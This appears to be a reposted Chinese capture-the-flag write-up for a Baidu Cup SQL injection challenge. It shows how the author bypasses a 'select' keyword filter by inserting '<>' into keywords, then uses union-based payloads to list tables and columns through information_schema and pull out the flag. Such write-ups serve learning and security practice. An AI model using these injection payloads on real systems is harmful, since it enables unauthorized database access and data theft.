sql注入用<>繞過被過濾的select ——百度杯9月第二場SQL


題目提示SQL注入,打開源代碼發現<!--SELECT * FROM info WHERE id=1-->

嘗試union select 1,2,3提示inj code!

經過多次嘗試之后發現select已經被過濾,於是百度繞過select過濾的方法,/*!%53eLEct*/,發現依舊無法繞過select過濾

經過再次嘗試后發現可以用<>進行繞過,於是構造payload  un<>ion sel<>ect 1,2,3

返回了一個2,說明第二個字段可以顯示

構建payload查詢表名 un<>ion sel<>ect 1,group_concat(table_name) ,3from information_shema.tables where table_schema=database()

發現有info表

構建payload查詢字段 un<>ion sel<>ect 1,group_concat(column_name) ,3 from information_schema.columns where table_name=0x696e666f(info的16進制)

發現有3個字段id,title,flAg_T5ZNdrm

構建payload獲取字段 un<>ion sel<>ect 1,group_concat(flAg_T5ZNdrm),3 from info

獲得flag

flag{f24a0c69-ee21-47c8-b54d-60f7728c5e6e}


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM